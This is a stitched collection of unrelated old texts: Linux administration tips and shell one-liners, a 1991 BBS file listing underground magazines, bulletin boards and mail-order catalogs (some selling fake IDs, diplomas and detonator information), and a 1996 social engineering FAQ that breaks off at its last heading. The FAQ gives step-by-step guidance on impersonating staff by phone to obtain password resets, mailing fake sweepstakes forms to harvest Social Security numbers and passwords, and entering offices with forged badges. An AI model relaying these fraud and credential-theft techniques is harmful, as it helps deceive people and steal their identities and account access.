ln -sf ../usr/share/zoneinfo/your/zone /etc/localtime

Replace your/zone with something like Australia/NSW or Australia/Perth. Have a look in the directories under /usr/share/zoneinfo to see what timezones are available.

[1] This assumes that /usr/share/zoneinfo is linked to /etc/localtime as it is under Red Hat Linux.

[2] On older systems, you'll find that /usr/lib/zoneinfo is used instead of /usr/share/zoneinfo. See also the later section ``The time in some applications is wrong''.

Zombies(#15) What are these zombie processes that show up in ps? I kill them but they don't go away!

Zombies are dead processes. You cannot kill the dead. All processes eventually die, and when they do they become zombies. They consume almost no resources, which is to be expected because they are dead! The reason for zombies is so the zombie's parent (process) can retrieve the zombie's exit status and resource usage statistics. The parent signals the operating system that it no longer needs the zombie by using one of the wait() system calls.

When a process dies, its child processes all become children of process number 1, which is the init process. Init is ``always'' waiting for children to die, so that they don't remain as zombies.

If you have zombie processes it means those zombies have not been waited for by their parent (look at PPID displayed by ps -l). You have three choices: Fix the parent process (make it wait); kill the parent; or live with it. Remember that living with it is not so hard because zombies take up little more than one extra line in the output of ps.

How do i give users an ftp only account (no telnet, etc).(#16)

give them shell which doesn't work, but is listed in /etc/shells for example /bin/false...

How to do backup with tar?(#17) You can mantain a list of files that you with to backup into a file and tar it when you wish.

tar czvf tarfile.tar.gz -T list_file

where list_file is a simple list of what you want to include into the tar

i.e:

/etc/smb.conf /root/myfile /etc/ppp (all files into the /etc/ppp directory) /opt/gnome/html/gnome-dev-info.html

How to keep a computer from answering to ping?(#18)

a simple "echo 1 > /proc/sys/net/ipv4/icmp_echo_ignore_all" will do the trick... to turn it back on, simply "echo 0 > /proc/sys/net/ipv4/icmp_echo_ignore_all"

Customizing your directory colors.(#19) I know a lot of you know the command ls --color. Which displays your directory with colors. But, a lot of people may not know that those colors are customizable. All you need to do is add the following line to your /etc/bashrc file.

eval `dircolors /etc/DIR_COLORS`

And then all of the color configuration can be found in the file /etc/DIR_COLORS

Frozen Xwindow(#20) If your Xwindow freezes sometimes, here are two ways that you may try to kill your server. The first is the simple simple way of killing your X server the key combination: Ctrl+Alt+Backspace

The second way is a little more complicated, but it works most of the time. Hit Ctrl+Alt+F2 to startup a virtual console, then log in with your user name and password and run:

# ps -ax | grep startx

This will give you the PID of your Xserver. Then just kill it with:

# kill -9 PID_Number

To go back to your first console, just hit Alt-F1

Converting all files in a directory to lowercase.(#21) #!/bin/sh # lowerit # convert all file names in the current directory to lower case # only operates on plain files--does not change the name of directories # will ask for verification before overwriting an existing file for x in `ls` do if [ ! -f $x ]; then continue fi lc=`echo $x | tr '[A-Z]' '[a-z]'` if [ $lc != $x ]; then mv -i $x $lc fi done

Wow. That's a long script. I wouldn't write a script to do that; instead, I would use this command:

for i in * ; do [ -f $i ] && mv -i $i `echo $i | tr '[A-Z]' '[a-z]'`; done;

on the command line.

Script to view those compressed HOWTOs.(#22) From a newbie to another, here is a short script that eases looking for and viewing howto documents. My howto's are in /usr/doc/faq/howto/ and are gzipped. The file names are XXX-HOWTO.gz, XXX being the subject. I created the following script called "howto" in the /usr/local/sbin directory:

#!/bin/sh if [ "$1" = "" ]; then ls /usr/doc/faq/howto | less else gunzip -c /usr/doc/faq/howto/$1-HOWTO.gz | less fi

When called without argument, it displays a directory of the available howto's. Then when entered with the first part of the file name (before the hyphen) as an argument, it unzips (keeping the original intact) then displays the document. For instance, to view the Serial-HOWTO.gz document, enter:

$ howto Serial

Util to clean up your logfiles.(#23)

If you're like me, you have a list with 430 subscribers, plus 100+ messages per day coming in over UUCP. Well, what's a hacker to do with these huge logs? Install chklogs, that's what. Chklogs is written by Emilio Grimaldo, grimaldo@panama.iaehv.nl, and the current version 1.8 available from ftp.iaehv.nl:/pub/users/grimaldo/chklogs-1.8.tar.gz. It's pretty self explanatory to install(you will, of course, check out the info in the doc subdirectory). Once you've got it installed, add a crontab entry like this:

# Run chklogs at 9:00PM daily. 00 21 * * * /usr/local/sbin/chklogs -m

Handy Script to Clean Up Corefiles.(#24) Create a file called rmcores(the author calls it handle-cores) with the following in it:

#!/bin/sh USAGE="$0 "

if [ $# != 2 ] ; then echo $USAGE exit fi

echo Deleting... find $1 -name core -atime 7 -print -type f -exec rm {} \;

echo e-mailing for name in `find $1 -name core -exec ls -l {} \; | cut -c16-24` do

echo $name cat $2 | mail $name done

And have a cron job run it every so often.

Moving directories between filesystems.Quick way to move an entire tree of files from one disk to another (#25) (cd /source/directory && tar cf - . ) | (cd /dest/directory && tar xvfp -)

[ Change from cd /source/directory; tar....etc. to prevent possibility of trashing directory in case of disaster.]

Finding out which directories are the largest.Ever wondered which directories are the biggest on your computer? Here's how to find out.(#26) du -S | sort -n

How do I stop my system from fscking on each reboot?(#27) When you rebuild the kernel, the filesystem is marked as 'dirty' and so your disk will be checked with each boot. The fix is to run:

rdev -R /zImage 1

This fixes the kernel so that it is no longer convinced that the filesystem is dirty.

Note: If using lilo, then add read-only to your linux setup in your lilo config file (Usually /etc/lilo.conf)

How to avoid fscks caused by "device busy" at reboot time.(#28) If you often get device busy errors on shutdown that leave the filesystem in need of an fsck upon reboot, here is a simple fix: To /etc/rc.d/init.d/halt or /etc/rc.d/rc.0, add the line

mount -o remount,ro /mount.dir

for all your mounted filesystems except /, before the call to umount -a. This means if, for some reason, shutdown fails to kill all processes and umount the disks they will still be clean on reboot. Saves a lot of time at reboot for me.

How to find the biggest files on your hard-drive.(#29)

ls -l | sort +4n

Or, for those of you really scrunched for space this takes awhile but works great:

cd / ls -lR | sort +4n

A script for cleaning up after programs that create autosave and backup files.(#30) Here is a simple two-liner which recursively descends a directory hierarchy removing emacs auto-save (#) and backup (~) files, .o files, and TeX .log files. It also compresses .tex files and README files. I call it 'squeeze' on my system.

#!/bin/sh

#SQUEEZE removes unnecessary files and compresses .tex and README files #By Barry tolnas, tolnas@sun1.engr.utk.edu # echo squeezing $PWD find $PWD \( -name \*~ -or -name \*.o -or -name \*.log -or -name \*\#\) -exec rm -f {} \; find $PWD \( -name \*.tex -or -name \*README\* -or -name \*readme\* \) -exec gzip -9 {} \;

How to find out what process is eating the most memory.(#31) ps -aux | sort +4n

-ORps -aux | sort +5n

How do I find which library in /usr/lib holds a certain function?(#32) What if you're compiling and you've missed a library that needed linking in? All gcc reports are function names... Here's a simple command that'll find what you're looking for:

for i in *; do echo $i:;nm $i|grep tgetnum 2>/dev/null;done

Where tgetnum is the name of the function you're looking for.

I compiled a small test program in C, but when I run it, I get no output!(#32) You probably compiled the program into a binary named test, didn't you? Linux has a program called test, which tests if a certain condition is true, it never produces any output on the screen. Instead of just typing test, try: ./test From: The Butler / Ripco BBS Subject: An Introduction to the Computer Underground

Date: February 26, 1991

******************************************************************************* * * * * * * * * 2/26/91 The Butler... * * Brought to you by, * * * An Introduction to the Computer Underground * * *

*******************************************************************************

The Computer Underground consists of mainly two forms of media, printed and electronic, both will be discussed in this file. I use the word underground because some of the contents of this file are not the types of titles you would run across at your local bookstore or newsstand. The kind of information that makes up underground publications is mainly technical in nature, but, definitely not limited to that. One can also find tidbits about off-the-wall political views, drugs, weapons, and other topics that are not normally in the mainstream of our society.

The Computer Underground...

Com-put-er Un-der-ground \kem-`pyt-er\ \`en-der-`grand\ (1970's)

A group organized in secrecy, hidden behind aliases, to promote the free exchange of information regarding anything and everything including but not limited to Computers, Telephones, Radios, Chemicals, and ideas.

The CU is made up of men and women all over the globe and of all ages. Most of those involved in the CU consider it a hobby, but, there are those that are involved strictly for illegal purposes, i.e. Selling Pirated Software. I, like most people involved enjoy the information that can be obtained through all of the different avenues in the CU, i.e. Bulletin Boards, Underground Periodicals, Network Digests, and General Discussions between members.

The most common way members communicate is through Bulletin Boards. If you are reading this you know what a BBS is because this will not be released in printed form. There are thousands of BBSes around the world run by people for many reasons including: legitimate businesses, Software Technical Support, Hobby related, Pirated Software, Message Centers, etc...Some of the more common ones are RIPCO, Face-2-Face, Exec-PC, The Well, etc...

Currently there are many regular electronic magazines that are being published and there have been many that have discontinued for one reason or another. Some current ones include: PHRACK, NIA, PHANTASY, CUD, etc...Some discontinued

ones include: PIRATE, PHUN, NARC, etc...

There is a current debate about whether or not an electronic media has the same constitutional rights as the printed one. That is for our congressmen to decide, but you could voice your opinion. I personally can't see the differ-ence. Now, don't get me wrong I do not support the publishing of Longdistance codes or anything of that nature, but, I do support the exchange of other information, i.e. how to unprotect a game, how to make a smoke bomb, etc...

There are also "Underground Publications" like TAP, 2600, Cybertek, etc. These magazines are published in hard copy and deal with every considerable topic regarding the CU. Most of these magazines publish completely legal information that is obtained from public sources and is available to anyone and everyone.

I doubt that any of the following sources of information would mind if you use an alias to order any of their material, so I would recommend that you do just in case! You might even want to get yourself a private mail box for all of this "underground" information. I would also advise you to use a money order when purchasing anything also. They usually cost an extra 50 cents at the post office. Don't worry about using money orders with these people because I have personally made purchases from many of them without trouble.

The following information is provided to enable you to become more familiar

with the CU and unusual information in general. Have fun and try not to get yourself in trouble.

Now for the meat of this Article!!!!

ELECTRONIC MAGAZINES

PHRACK Predecessor to Phrack Classic Author: Knight Lightning & Taran King Network Address:c483307@umcvmb.missouri.edu Other Address: BBS: None Last Issue: Phrack #30

PHRACK CLASSIC Author: Doc Holiday, Crimson Death & Various Contributors Network Address: pc@well.uucp or cdeath@stormking.com Other Address: BBS: None Last Issue: Phrack Classic #32 11/90

LOD

Legion Of Doom Technical Journals Author: Eric Bloodaxe, Lex Luthor, Prime Suspect, Phase Jitter, Professor Phalken, Skinny Puppy. Network Address: None

Other Address: BBS: Last Issue: LOD Tech Journal #4 May 20, 1990

PHUN Phreakers/Hackers Underground Network Author: Red Knight Network Address: N/A Other Address: BBS: Last Issue: P/HUN #5 05/07/90

ATI

Activist Times, Incorporated Author: Ground Zero Network Address: gzero@tronsbox.xei.com Other Address: ATI P.O. Box 2501 Bloomfield, NJ 07003 BBS: Last Issue: ATI #53 12/05/90

NIA

Network Information Access Author: Guardian Of Time & Judge Dredd Network Address: elisem@nuchat.sccsi.com Other Address: BBS: Last Issue: NIA #70 02/91

PHANTASY Author: The Mercenary Network Address: None Other Address: The I.I.R.G. 862 Farmington Ave, Suite-306, Bristol, Ct 06010 BBS: Rune Stone 203-485-0088 Last Issue: Phantasy V1N4 1/20/91

PIRATE Author: Various Authors Network Address: N/A Other Address: BBS: N/A Last Issue: V1 #5 April 1990

ANE

Anarchy 'N' Explosives Author: Various Authors Network Address: N/A Other Address: BBS: N/A Last Issue: #7 06/16/89

NARC Nuclear Phreakers/Hackers/Carders Author: The Oxidizer Network Address: N/A Other Address: BBS: Last Issue: NARC #7 Fall 1989

SYNDICATE REPORTS Author: The Sensei Network Address: Other Address: BBS: Last Issue:

This is not an attempt to list all of the known magazines but just some of the more popular ones. If I left a particular one out that you feel should of been included I apologize.

All of the above magazines can be found in the CUD archives and at many of the Bulletin Board Systems listed at the end of this file.

PRINTED MAGAZINES

Author: Emmanuel Goldstein Network Address: 2600@well.sf.ca.us Other Address: 2600 Magazine, P.O. Box 752, Middle Island, NY 11953

2600 Magazine is published quarterly, 48 pages per issue. Subscriptions are $18 U.S. for a year in the U.S. and Canada, $30 overseas. Corporate subscriptions are $45 and $65 respectively. Back issues are available for $25 per year, $30 per year overseas and they go back to 1984.

Phone 516-751-2600 Fax 516-751-2608

TAP/YIPL Formerly YIPL "Youth International Party Line" Now TAP "Technical Assistance Party"

TAP Magazine P.O. Box 20264 Louisville, KY 40250 Most all issues will cost $1.00 for US Citizens and $2.00

for overseas. Terms are CASH, postal money order, or regular money order with the payee left blank. BBS: 502-499-8933

Cybertek Magazine Published by OCL/Magnitude P.O. Box 64 Brewster NY 10509 $2.50 for sample issue $15 year for 6 issues

Mondo 2000 (Formerly Reality Hackers Magazine / High Frontiers) P.O. Box 10171 Berkley, CA 94709-5171 Phone 415-845-9018 Fax 415-649-9630 $24 for five issues Frank Zappa subscribes to Mondo 2000!!!

Fact Sheet Five 6 Arizona Ave Rensselaer, NY 12144-4502 $3.50 for a sample issue. $33 a year for 8 issues

Phone 518-479-3707

Fact Sheet Five reviews any independent news media, i.e. 2600, TAP, Books, Music, Software, etc.

Full Disclosure by Glen Roberts P.O. Box 903-C Libertyville, Illinois 60048 Free sample issue $18 for 12 issues

Deals with Privacy, electronic surveillance and related topics.

Anvil P.O. Box 640383f El Paso, TX 79904

Computer Security Digest 150 N. Main Street Plymouth, MI 48170 Phone 313-459-8787 Fax 313-459-2720 $125 U.S. per year. Overseas $155 U.S. per year.

HAC-TIC Dutch Hacking Magazine Network Address: ropg@ooc.uva.nl Other Address: Hack-Tic P.O. Box 22953 1100 DL Amsterdam Phone: +31 20 6001480

Privacy Journal P.O. Box 15300 Washington D.C. 20003 Phone 202-547-2865

Monitoring Times 140 Dog Branch Road Brasstown, North Carolina 28902

BOOKS

Anarchist Cookbook???

Poor Man's James Bond by Kurt Saxon

Big Secrets by William Poundstone

Bigger Secrets by William Poundstone

How to get anything on anybody by Lee Lapin

Signal--Communication Tools for the Information Age A Whole Earth Catalog (Highly Recommended!!!)

Neuromancer by William Gibson

Out of The Inner Circle by Bill Laundreth

Hackers by Steven Levy

The Cookoo's Egg by Clifford Stoll

The Shockwave Rider

Information for sale by John H. Everett

Hackers Handbook III by Hugo Cornwall

Datatheft by Hugo Cornwall

The International Handbook on Computer Crime by U. Sieber

Fighting Computer Crime by D. Parker

Foiling the System Breakers by J. Lobel

Privacy in America by D. Linowes

Spectacular Computer Crimes by Buck BloomBecker

Steal This Book by Abbie Hoffman

MISCELLANEOUS CATALOGS

Loompanics LTD P.O. Box 1197 Port Townsend, WA 98368

Paladin Press ????

Consumertronics 2011 Crescent DR. P.O. Drawer 537 Alamogordo, NM 88310

Phone 505-434-0234 Fax 500-434-0234(Orders Only)

Consumertronics sells manuals on many different hacking/phreaking related topics, i.e. "Voice Mail Box Hacking", "Computer Phreaking", etc.

Eden Press Privacy Catalog 11623 Slater "E" P.O. Box 8410 Fountain Valley, CA 92728 Phone 1-800-338-8484 24hrs, 7 days a week.

Here is the opening paragraph from their catalog:

Welcome to the Privacy Catalog, Over 300 publications explore every aspect of privacy in ways that are not only unique, but also provocative. Some books may seem "controversial", but that results only from the fact that people can enjoy many different views of the same subject. We endeavor to offer views that will prove both helpful and thoughtful in the many areas where privacy may be a concern.

Criminal Research Products 206-218 East Hector Street Conshocken,PA 19428

Investigative equipment and electronic surveillance items.

Ross Engineering Associates 68 Vestry Street New York,NY 10013

Surveillance items

Edmund Scientific CO. 101 E. Gloucester Pike Barrington, NJ 08007

Catalog of gadgets and devices including items which are useful to the surveillance craft.

Diptronics P.O. BOX 80 Lake Hiawatha, NJ 07034

Microwave TV Systems Catalog costs $3

Garrison P.O. BOX 128 Kew Gardens, NY 11415

Locksmithing tools and electronic security gadgets. Catalog costs $2.

Bnf Enterprises P.O. BOX 3357 Peabody, MA 01960

General electronics supplier.

Mouser Electronics 11433 Woodside avenue Santee, CA 92071

Sells most electronic components parts and equipment.

Benchmark Knives P.O. BOX 998 Gastonia, NC 28052

Call for a free catalog. (704-449-2222).

Excalibur Enterprises P.O. BOX 266 Emmans, PA 18049

Night vision devices. Catalog costs $5

DECO INDUSTRIES BOX 607 Bedford Hills, NY 10157

Sells mimiture Electronic Kits

Matthews Cutlery 38450-A N. Druid Hills RD. Decatur, GA 30033

Their catalog contains over 1000 knives and costs $1.50.

U.S. Cavalry Store 1375 N. Wilson Road Radcliff, KY 40160

Military & paramilitary clothing & gear. Catalog costs $3.

The Intelligence Group 1324 West Waters Avenue

Lighthouse Point, FL 33064

Sells video equipment used for investigative purposes.

Columbia Pacific University 1415 Third Street San Rafael, CA 94901

Bachelors, Masters, and Doctorate degrees

Video & Satellite Marketeer P.O. BOX 21026 Columbus, OH 43221

Newsletter containing video, vcr, satellite dishes, etc.

Santa Fe Distributors 14400 W. 97'TH Terrace Lenexa, KS 66215

Radar detectors and microwave tv systems. (913-492-8288)

Alumni Arts

BOX 553 Grant's Pass, OR 97526

Reproductions of college diplomas. Catalog costs $3

Merrell Scientific CO. 1665 Buffalo Road Rochester, NY 14624

Chemical suppliers Catalog costs $3.

K Products P.O. BOX 27507 San Antonio, TX 78227

I.D. Documents. Catalog costs $1.

City News Service P.O. BOX 86 Willow Springs, MO 65793

Press I.D. cards.

Catalog costs $3.

Matthews Police Supply CO. P.O. BOX 1754 Matthews, NC 28105

Brass knuckles etc.

Taylor P.O. BOX 15391 W. Palm Beach, FL 33416

Drivers license, student I.D. cards, etc.

Capri Electronics ROUTE 1 Canon, GA 30250

Scanner accessories

Liberty Industries BOX 279 RD 4 Quakertown, PA 18951

Pyrotechnic components

Catalog costs $1

DE VOE P.O. BOX 32 BERLIN PA 15530

Sells information on making electronic detonators.

Scanner World USA 10 New Scotland Avenue Albany, NY 12208

Cheap scanner receivers.

H&W P.O. BOX 4 Whitehall, PA 18052

Human Skulls, arms, legs, etc. A complete list is available for $1 and Self Addressed Stamped Envelope.

Abbie-Yo Yo Inc. P.O. Box 15 Worcester MA 01613

This is an old address that I could not verify but, they used to sell the book "Steal This Book".

For most of these catalogs you could probably play dumb and just send them a letter asking for a catalog or brochure without paying a cent. Pretending not to know that their catalogs cost anything.

MISCELLANEOUS

REPORTS & PAPERS

Crime & Puzzlement by John Perry Barlow

The Baudy World of the Byte Bandit A Postmodernist Interpretation of the Computer Underground by Gordon Meyer & Jim Thomas

Concerning Hackers Who Break into Computer Systems by Dorothy E. Denning

The Social Organization of the Computer Underground by Gordon R. Meyer

Computer Security "Virus Highlights Need for Improved Internet Management" By the United States General Accounting Office. GAO/IMTEC89-57

Call 202-275-6241 for up to 5 free copies.

NETWORK

DIGESTS

Telecom Digest Moderator: Patrick Townson Network Address: telecom@eecs.nwu.edu

Risks Digest Moderator: Peter G. Neumann Network Address: Risks@csl.sri.com

Virus-l Digest Moderator: Kenneth R. Van Wyk Network Address: krvw@cert.sei.cmu.edu

Telecom Privacy Digest Moderator: Dennis G. Rears Network Address: telecom-priv@pica.army.mil

EFF News Electronic Frontier Foundation Network Address: effnews@eff.org Other Address: 155 Second Street Cambridge, MA 02141 Phone: 617-864-0665

Computer Underground Digest Moderators: Jim Thomas & Gordon Meyer Network Address: tk0jut2@niu

FTP SITES CONTAINING C U MATERIAL

192.55.239.132 128.95.136.2 128.237.253.5 130.160.20.80 130.18.64.2 128.214.5.6 "MARS Bulletin Board" Login "bbs" 128.82.8.1 128.32.152.11 128.135.12.60

All of the above accept anonymous logins!

BULLETIN

BOARDS

Ripco Face-2-Face

312-528-5020 713-242-6853

Rune Stone The Works The Well Blitzkrieg Uncensored Manta Lair

203-485-0088 Home of NIA 617-861-8976 415-332-6106 502-499-8933 Home of TAP 914-761-6877 206-454-0075 Home of Cybertek

INDIVIDUAL NETWORK ADDRESSES

Aristotle

Former Editor of TAP Magazine uk05744@ukpr.uky.edu or uk05744@ukpr.bitnet

Dorthy Denning

Author of "Concerning Hackers Who Break into

Computer Systems" denning@src.dec.com

Clifford Stoll

Author of "Cookoo's Egg" cliff@cfa.harvard.edu

Craig Neidorf

Former Editor of Phrack Magazine c483307@umcvmb.missouri.edu

Ground Zero

Editor of ATI Inc. gzero@tronsbox.xei.com

MISC SOFTWARE

SPAudit Self-Audit-Kit 1101 Connecticut Avenue Northwest Suite 901 Washington DC 20036 Phone 202-452-1600 Fax 202-223-8756

Free!!!

I would like to thank everyone who gave me permission to use their information in this file.

The information provided here is for informational purposes only. What you choose to do with it is your responsibility and no one else's. That means not me, and not the BBS you downloaded this from!

To my knowledge this is the most comprehensive and upto date list of underground books, catalogs, magazines, electronic newsletters, and network addresses available. If there are any additions or corrections to this list please contact me via the Ripco BBS.

The Butler... THE COMPLETE SOCIAL ENGINEERING FAQ! "There's a sucker born every minute." PT Barnum

"Don't touch me, sucka." Mr. T

By bernz (official sponsor of the 1996 Croatian Olympic Men's Synchronized Swimming Team) with shoutouts to: The Genocide2600, Silicon Toad and your big fat mama.

DISCLAIMER!!!!! THIS INFORMATION IS HERE FOR THE SOLE PURPOSE OF ENLIGHTENMENT! IF YOU USE IT AND GET CAUGHT, NO ONE IS TO BLAME BUT YOUR OWN IDIOTIC ASS!!!

SECTION I: INTRO 1.1 What is social engineering? 1.2 Why is there a FAQ about it? 1.3 Who cares? 1.4 Basic intro and other shit.

SECTION II: PHONE SOCIAL ENGINEERING 2.1 Basics 2.2 Equipment

2.3 Phreak stuff 2.4 Technique

SECTION III: SNAIL MAIL 3.1 Is Snail Mail acutally usefull for something? 3.2 Equipment 3.3 Technique

SECTION IV: INTERNET 4.1 Isn't this just hacking?

SECTION V: LIVE, FROM NEW YORK... 5.1 In person? 5.2 Equipment 5.3 I'm wearing a suit, now what?

SECTION VI: PUTTING IT TOGETHER A sample problem

1.1 What is social engineering?

The hacker's jargon dictionary says this:

Social Engineering: n. Term used among crackers and samurai for cracking techniques that rely on weaknesses in wetware rather than software; the aim

is to trick people into revealing passwords or other information that compromises a target system's security. Classic scams include phoning up a mark who has the required information and posing as a field service tech or a fellow employee with an urgent access problem.

This is true. Social engineering, from a narrow point of view, is basically phone scams which pit your knowledge and wits against another human. This technique is used for a lot of things, such as gaining passwords, keycards and basic information on a system or organization.

1.2 Why is there a FAQ about it?

Good question. I'm glad I asked. I made this for a few reasons. The first being that Social Engineering is rarely discussed. People discuss cracking and phreaking a lot, but the forum for social engineering ideas is stagnant at best. Hopefully this will help generate more discussion. I also find that social engineering specialists get little respect, this will show ignorant hackers what we go through to get passwords. The last reason is honestly for a bit of Neophyte training. Just another DOC for them to read so I don't get bogged with email.

1.3 Who Cares?

To Neophytes: You should, you little fuck. If you think the world of computers and security opens up to you through a keyboard and your redbox then

you are so fucking dead wrong. Good. Go to your school, change your grades and be a "badass" hacker. Hacking, like real life, exists in more than just your system. You can't use proggies to solve everything. I don't mean to sound upset, but jesus, have a bit of innovation and a sense of adventure.

To Experienced Hackers: Just thought it would help a bit.

1.4 Basic intro and shit for this document.

This FAQ will address phone techniques, mail techniques, internet techniques and live techniques. I will discuss Equipment and will put some scripts of actual conversations from social engineering. There are times I might discuss things that cross the line into phreaking or traditional hacking. Don't send me email and say that my terms aren't correct and blahblahblah isn't social engineering. I use them for convenience and lack of better methods of explanation (eg I might say "dumpster diving is a form of social engineering") Don't get technical.

SECTION II: PHONES

2.1 Basics

This is probably the most common social engineering technique. It's quick, painless and the lazy person can do it. No movement, other than fingers is necessary. Just call the person and there you go. Of course it gets more

complicated than that.

2.2 What Equipment is necessary for this?

The most important peice of hardware is your wetware. You have to have a damn quick mind. As far as physical Equipment goes, a phone is necessary. Do not have call waiting as this will make you sound less believeable. There is no real reason why this does but getting beeped in the middle of a scam just throws off the rhythym. The phone should be good quality and try to avoid cordless, unless you never get static on them. Some phones have these great buttons that make office noise in the background. Caller ID units are helpful if you pull off a scam using callback. You don't want to be expecting your girlfriend and pick up the phone and say, "I wanna fuck you" only to find out it was an IBM operator confirming your identity. Operators don't want to have sex with you and so your scam is fucked. Besides, call ID units are just cool because you can say, "Hello, <blank>" when someone calls. The Radio Slut carries these pretty cheap. Something I use is a voice changer. It makes my voice sound deeper than James Earl Jones or as high as a woman. This is great if you can't change your pitch very well and you don't want to sound like a kid (rarely helpful). Being able to change gender can also be very helpful (see technique below). I got one for a gift from Sharper Image. This means that brand will cost quite a bit of cash, but it's very good quality. If anyone knows of other brand of voice changers, please inform me.

2.3 Phreaking and Social engineering?

Social Engineering and phreaking cross lines quite a lot. The most obvious reasons are because phreaks need to access Ma Bell in other ways but computers. They use con games to draw info out of operators. Redboxing, greenboxing and other phreaking techniques can be used to avoid the phone bills that come with spending WAAAAYYY too much time on the phone trying to scam a password. Through the internet, telnetting to california is free. Through ma bell, it's pricey. I say making phone calls from payphones is fine, but beware of background noise. Sounding like you're at a payphone can make you sound pretty unprofessional. Find a secluded phone booth to use.

2.4 How do I pull off a social engineering with a phone?

First thing is find your mark. Let's say you want to hit your school. Call the acedemic computer center (or its equivelent). Assuming you already have an account, tell them you can't access your account. At this point they might do one of two things. If they are stupid, which you hope they are, they will give you a new password. Under that precept, they'll do that for most people. Simply finger someone's account, specifically a faculty member. At this point, use your voice changer when you call and imitate that teacher the best you can. People sound different over the phone, so you'll have a bit of help. Try to make the person you're imitating a female (unless you are a female). Most of the

guys running these things will give anything to a good sounding woman because the majority of the guys running minicomputers are social messes. Act like a woman (using voice changer) and you'll have anything you want from them. Most of the time the people working an area will ask for some sort of verification for your identity, often a social security number. You should find out as much information about a mark as you can (see mail and live techniques) before you even think about getting on the phone. If you say you are someone you aren't and then they ask you for verification you don't have, they will be suspicious and it will be infinitely more difficult to take that system. Once again for idiots: DO NOT TRY TO SOCIAL ENGINEER WITHOUT SUFFICIENT INFORMATION ON YOUR MARK! Once people believe you are someone, get as much as you can about the system. Ask for your password, ask for telnet numbers, etc. Do not ask for too much as it will draw suspicion. You must sound like a legitimate person. Watch your mark. Learn to speak like him/her. Does that person use contractions? Does that person say "like" a lot? Accent? Lisp? The best way for observation of speech is to call the person as a telemarketer or telephone sweepstakes person. Even if they just tell you they can't talk to you, you can learn a quite a bit from the way they speak. If they actually want to speak to you, you can use that oppurtunity to glean information on them. Tell them they won something and you need their address and social security number and other basic info.

WARNING: ABUSING SOMEONE'S SOCIAL SECURITY NUMBER IS ILLEAGAL!!! DON'T SAY YOU WEREN'T WARNED!!!

SECTION III: SNAIL MAIL

3.1 Is snail mail really useful?

Yes. It actually is. Snail mail is not tapped. Snail mail is cheap. Snail mail is readily available. But how can you use it in social engineering. As I said above, it's difficult to find systems that just let you call with no verification. They do exist but they are rare. So therefore you need info on your mark and the mark's system. You can try the telemarketing scam, but that isn't always succesful, as people do not trust telemarketers. For some reason, though, people trust the written word. Morons. People will respond to sweepstakes forms with enthusiasm and will give you whatever info you want on it. That's why snail mail is so great.

3.2 What do I need?

Obviously you need mail "equpiment" which includes stamps and envelopes. But subtle things are required as well. You're going to want to have return address stickers that include "your company's" logo and name. This can be procured at places like Staples, Office Max and other stores for a realitively cheap price. The most important part to mail social engineering is a layout program. WordPerfect is okay, but I prefer QuarkXpress or PageMaker. These programs are not cheap, but can be used for plenty of other applications and are well worth their price. IF YOU GET IT PIRATED, I DON'T ADVOCATE THAT ACTION. With these DTP programs, you can emmulate a tottaly

professional document. More about this below. A private mailbox is good. If you want to be very professional, get a PO box. I'm in a band, so I use that PO box. They can be rented at a variety of places, including Post Offices and MailBoxes, etc. for low fees. Share the cost with others for great cost effectiveness.

3.3 I've got the stuff, now what?

What is your mark? Generally, for a mail social engineer, your mark is going to be a large group of people. Thus, your mail should look like a mass mail sweepstakes. Use computer labels and the like to keep this illusion. You need a list of employees from that company and their addresses. Look at the junk mail in your mail. Sweepstakes forms, mail-in orders, etc. Try tofake that look. Something with very few lines to fill in (but with your vital info on them). A watermark is always a good touch for these documents. Use the fonts a business would use and word your letters in a similar fashion. Illusion is everything. The information on these should include social security numbers. Another good idea is to say that you'll need a password to verify the prize with a voice call. Hopefully it'll be the same as their net account password. It usually is. Yes, people actually fall for this stuff. To make someone fill these out, they must be concise and visually appealling. A person filling these out cannot be hasseled with difficult choices. Check Boxes are also a nice effect. These must look believeable. Credibility is everything with social engineering. I cannot stress that enough. I will soon realease examples, although you should be original and make some on your own. Now, after stamping and addressing your letters, send them out and wait. Soon you should receive some answers. At this point, use a standard phone social engineering. Social

Security numbers are the most common verification. If you find that you need some other form, send out letters with that information. For example, sometimes mother's maiden name is used.

SECTION IV: INTERNET

4.1 Isn't this just a form of hacking?

I guess it is to a point. Hacking takes more advantage of holes in security while the social engineering takes advantage of holes in people's common sense. Finding your marks through a hole in the fingering system is a great way to start an engineer. Many fingers give full names last logins, login locations and all sorts of info. Find someone who hasn't been on in quite sometime. There are also the classic schemes. Pretending to be a sysop in an IRC or online chat room can make people give up passwords with ease. Yes, generally actions taken in the Internet or online are considered traditional hacking, but your knowledge of the average human's wetware comes into play.

SECTION V: LIVE, FROM NEW YORK...

5.1 In person?

Yup. This is pretty damn important. You can do quite a bit over a phone or through mail, but sometimes you just have to get off your ass and do things yourself. Getting a password digging through a desk is good, so is touring an office and just looking around. Even conning your way into a terminal works.

5.2 Equipment

This is the only time in hacker culture where looks matter a great deal. Don't expect to walk into VIACOM's offices wearing your Misfits T-shirt with lotsa zits and your walkman makes you look suspicious. Look dignified. Wear a suit. Comb your hair. Don't get out of hand. Be polite. If you want to look like you belong in that office, you should act that way, too. So you need a suit. If you weigh more than 200 lbs (and are under 6' 2") or look like you're 20 or younger, don't try this. You'll look dumb, be laughed at and possibly have security called on you. You can look like an office worker's kid if you're that young. If you can do this, go ahead. Most of us can't. Fake ID security cards (the kind that aligator clip to a belt or something) can be made with a photo, a layout program and a lamination sheet. This just makes you look more official. Sometimes one of this stick on visitor patches can be helpful. They make you look like your unnatural observation is warrented by your visiting status.

5.3 I'm sweating in this suit..now what?

Walk into an office building with confidence. Flash your badge or just have your visitor tag. Pretend you really belong there. That's how you look. An office with cubicles is great. Just walk around and peer at people's belongings. Find the company's UNIX minicomputer. They tend to keep them behind a big plate glass window, so you can check out how its connected. This is good scouting without having to sift through dumpsters or watching through binoculars. DO NOT TRY TO HACK WHILE IN THE BUILDING! IT'S PRETTY SUSPICIOUS LOOKING!

SECTION VI: PUTTING IT TOGETHER

